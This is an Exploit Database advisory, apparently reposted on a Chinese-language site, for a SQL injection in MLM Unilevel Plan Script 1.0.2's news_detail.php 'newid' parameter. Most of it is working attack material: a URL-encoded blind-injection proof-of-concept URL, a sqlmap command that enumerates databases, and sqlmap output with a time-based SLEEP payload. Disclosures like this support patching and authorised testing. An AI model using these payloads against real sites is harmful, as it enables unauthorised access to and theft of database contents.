MLM Unilevel Plan Script 1.0.2 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： N4TuraL
  日期： 2016-10-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40469/

• ######################
  # Application Name : MLM Unilevel Plan Script v1.0.2
  
  # Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
  
  # Author Contact : https://twitter.com/byn4tural
  
  # Vendor Homepage : http://www.i-netsolution.com/
  
  # Vulnerable Type : SQL Injection
  
  # Date : 2016-10-06
  
  # Tested on : Windows 10 / Mozilla Firefox
  # Linux / Mozilla Firefox
  # Linux / sqlmap 1.0.6.28#dev
  
  ###################### SQL Injection Vulnerability ######################
  
  # Location :
  http://localhost/[path]/news_detail.php
  
  ######################
  
  # PoC Exploit:
  
  http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x
  
  # Exploit Code via sqlmap:
  
  sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs
  
  ---
  Parameter: newid (GET)
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind
  Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB
  ---
  [18:47:12] [INFO] the back-end DBMS is MySQL
  web application technology: Nginx
  back-end DBMS: MySQL >= 5.0.12
  
  ######################